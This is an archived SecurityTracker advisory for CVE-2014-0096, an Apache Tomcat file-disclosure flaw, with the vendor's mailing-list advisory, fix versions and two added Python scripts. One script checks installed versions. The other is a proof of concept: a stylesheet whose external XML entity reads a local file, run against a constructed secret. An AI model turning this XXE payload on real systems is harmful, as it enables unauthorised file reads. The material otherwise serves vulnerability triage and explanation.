SecurityTracker.com

SecurityTracker
Archives

Category:   Application (Web Server/CGI)  >   Apache Tomcat
Vendors:   Apache Software Foundation
Apache Tomcat Security Manager Bug Lets Remote Authenticated Users Bypass Security Controls and View Files
SecurityTracker Alert ID:  1030301
SecurityTracker URL:  http://securitytracker.com/id/1030301
CVE Reference:   CVE-2014-0096
Date:  May 27 2014
Impact:   Disclosure of system information, Disclosure of user information
Fix Available:  Yes
Vendor Confirmed:  Yes
Version(s): 6.0.0 to 6.0.39, 7.0.0 to 7.0.52, 8.0.0-RC1 to 8.0.3
Description:   A vulnerability was reported in Apache Tomcat. A malicious web application running under a Java security manager can read files outside the access constraints the security manager imposes on it. Although this record is filed under "remote authenticated users", the attacker in the vendor's description is whoever controls the content of a deployed web application, for example a tenant on a shared Tomcat instance that relies on the security manager for isolation.

The default servlet allows a web application to supply, at several levels, an XSLT stylesheet used to format directory listings. Under a security manager that stylesheet was processed without the constraints applied to the web application itself, so a stylesheet declaring external XML entities could pull in files the application is not permitted to read.

The Tomcat security team reported this vulnerability.

Impact:   A malicious web application running under a security manager can read files that the security manager's file access constraints should deny it.
Solution:   The vendor has issued a fix (6.0.41, 7.0.53, 8.0.5).

The vendor's advisory is available at:

http://tomcat.apache.org/security-8.html

Vendor URL:  tomcat.apache.org/security-8.html
Cause:   Access control error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
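As an added aid for triage across a fleet (this script is not part of the SecurityTracker record or of Tomcat), the following Python encodes the affected ranges under Version(s) and the fixed releases under Solution. It reads the running version from ServerInfo.properties inside lib/catalina.jar, which is the file the org.apache.catalina.util.ServerInfo class (and therefore bin/version.sh) reports from; the jar built in demo() is constructed so the script runs offline. Release candidates are ordered before the corresponding final release so that the 8.0.0 release candidates fall inside the 8.x range, and 8.0.4 and 6.0.40, which the advisory says contain the fix but were never released, are treated as fixed.

```python
import os
import re
import tempfile
import zipfile

VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-RC(\d+))?$")

# (first affected, last affected, release to upgrade to), as listed in the advisory.
AFFECTED_RANGES = [
    ("6.0.0", "6.0.39", "6.0.41"),
    ("7.0.0", "7.0.52", "7.0.53"),
    ("8.0.0-RC1", "8.0.3", "8.0.5"),
]


def parse_version(text):
    """Turn '7.0.52' or '8.0.0-RC1' into a sortable tuple.

    A release candidate sorts before the final release with the same number,
    so 8.0.0-RC1 < 8.0.0-RC10 < 8.0.0 < 8.0.1.
    """
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised Tomcat version: {text!r}")
    major, minor, patch, rc = m.groups()
    return (int(major), int(minor), int(patch), 0 if rc else 1, int(rc or 0))


def assess(version):
    """Return (affected, fixed_release) for a version string."""
    v = parse_version(version)
    for first, last, fix in AFFECTED_RANGES:
        if parse_version(first) <= v <= parse_version(last):
            return True, fix
    return False, None


def version_from_catalina_jar(jar_path):
    """Read 'server.info=Apache Tomcat/X.Y.Z' from ServerInfo.properties
    inside lib/catalina.jar and return X.Y.Z."""
    with zipfile.ZipFile(jar_path) as jar:
        props = jar.read("org/apache/catalina/util/ServerInfo.properties").decode("utf-8")
    for line in props.splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip() == "server.info":
            return value.strip().split("/", 1)[1]
    raise ValueError("server.info not found in ServerInfo.properties")


def assess_jar(jar_path):
    """Assess the Tomcat installation whose catalina.jar is at jar_path."""
    return assess(version_from_catalina_jar(jar_path))


def demo(version="7.0.52"):
    """Build a constructed catalina.jar that claims the given version and assess it."""
    with tempfile.TemporaryDirectory() as tmp:
        jar_path = os.path.join(tmp, "catalina.jar")
        with zipfile.ZipFile(jar_path, "w") as jar:
            jar.writestr(
                "org/apache/catalina/util/ServerInfo.properties",
                f"server.info=Apache Tomcat/{version}\nserver.number={version}.0\n",
            )
        return assess_jar(jar_path)


if __name__ == "__main__":
    for v in ("6.0.39", "7.0.52", "7.0.53", "8.0.0-RC10", "8.0.4"):
        print(v, assess(v))
    print("constructed jar:", demo())
```

On a real host, point assess_jar() at $CATALINA_HOME/lib/catalina.jar; the only assumption beyond the advisory's own ranges is the location and key name of ServerInfo.properties.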

Message History:   This archive entry has one or more follow-up message(s) listed below.
Jul 4 2014 (Red Hat Issues Fix for JBoss) Apache Tomcat Security Manager Bug Lets Remote Authenticated Users Bypass Security Controls and View Files
Red Hat has issued a fix for JBoss.
May 18 2015 (IBM Issues Fix for IBM Power Hardware Management Console) Apache Tomcat Security Manager Bug Lets Remote Authenticated Users Bypass Security Controls and View Files
IBM has issued a fix for IBM Power Hardware Management Console.
Jul 30 2015 (Blue Coat Systems Issues Advisory for Blue Coat IntelligenceCenter) Apache Tomcat Security Manager Bug Lets Remote Authenticated Users Bypass Security Controls and View Files
Blue Coat Systems has issued an advisory for Blue Coat IntelligenceCenter 3.2 and 3.3.
Oct 16 2015 (HP Issues Fix for HP OpenVMS) Apache Tomcat Security Manager Bug Lets Remote Authenticated Users Bypass Security Controls and View Files
HP has issued a fix for HP OpenVMS.

Source Message Contents

Subject:  [FD] [SECURITY] CVE-2014-0096 Apache Tomcat information disclosure

CVE-2014-0096 Information Disclosure

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
- Apache Tomcat 8.0.0-RC1 to 8.0.3
- Apache Tomcat 7.0.0 to 7.0.52
- Apache Tomcat 6.0.0 to 6.0.39

Description:
The default servlet allows web applications to define (at multiple
levels) an XSLT to be used to format a directory listing. When running
under a security manager, the processing of these was not subject to the
same constraints as the web application. This enabled a malicious web
application to bypass the file access constraints imposed by the
security manager via the use of external XML entities.

Mitigation:
Users of affected versions should apply one of the following mitigations
- Upgrade to Apache Tomcat 8.0.5 or later
  (8.0.4 contains the fix but was not released)
- Upgrade to Apache Tomcat 7.0.53 or later
- Upgrade to Apache Tomcat 6.0.41 or later
  (6.0.40 contains the fix but was not released)

Credit:
This issue was identified by the Tomcat security team.

References:
[1] http://tomcat.apache.org/security-8.html
[2] http://tomcat.apache.org/security-7.html
[3] http://tomcat.apache.org/security-6.html

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
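The mechanism the advisory describes (an XSLT stylesheet supplied by the web application, parsed with external entity resolution in a privilege context broader than the application's) is modelled below with Python's standard-library SAX parser standing in for the JDK XML parser the Tomcat default servlet uses. This is an added example, not code from Tomcat or from the advisory; the stylesheet, the entity name leak, the file secret.properties and its contents are all constructed. The same stylesheet is parsed twice: with external general entities enabled the file contents appear in the output, with them disabled the reference is dropped. The second behaviour is what a deployer wants from any XML processing of attacker-controlled stylesheets, and running the two parses is a quick way to confirm what a parser does by default.

```python
import io
import os
import pathlib
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed stand-in for a file the web application is not allowed to read.
SECRET = "db.password=hunter2\n"


def listing_stylesheet(secret_path):
    """Build a directory-listing XSLT (constructed, not Tomcat's) whose internal
    DTD subset declares an external general entity pointing at secret_path and
    expands it into the rendered listing."""
    uri = pathlib.Path(secret_path).resolve().as_uri()
    return f"""<?xml version="1.0"?>
<!DOCTYPE xsl:stylesheet [
  <!ENTITY leak SYSTEM "{uri}">
]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/listing">
    <html><body>
      <h1>Directory listing for <xsl:value-of select="@directory"/></h1>
      <pre>&leak;</pre>
    </body></html>
  </xsl:template>
</xsl:stylesheet>
""".encode("utf-8")


class TextCollector(ContentHandler):
    """Records every character-data event, i.e. everything the parser expanded."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse_stylesheet(xslt_bytes, resolve_external):
    """Parse the stylesheet with the external-general-entities feature set as
    requested and return the text the parser produced."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xslt_bytes))
    return "".join(collector.parts)


def leaked_text(resolve_external):
    """Write the constructed secret to a temp dir, then parse a stylesheet that
    references it. Returns the parser's text output."""
    with tempfile.TemporaryDirectory() as tmp:
        secret_path = os.path.join(tmp, "secret.properties")
        with open(secret_path, "w", encoding="utf-8") as fh:
            fh.write(SECRET)
        return parse_stylesheet(listing_stylesheet(secret_path), resolve_external)


def secret_leaks(resolve_external):
    """True if the secret's contents ended up in the parser output."""
    return SECRET.strip() in leaked_text(resolve_external)


if __name__ == "__main__":
    for setting in (True, False):
        print(f"external entities resolved={setting}: leaked={secret_leaks(setting)}")
```

parse_stylesheet() models only the entity-expansion step. In Tomcat the transformation is done by javax.xml.transform, and what made the issue exploitable was the privilege context that step ran in, not the entity syntax itself. Note that an external entity is parsed as XML text, so a target file containing < or & would make the parse fail; the constructed secret avoids that.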
 
 


Copyright 2019, SecurityGlobal.net LLC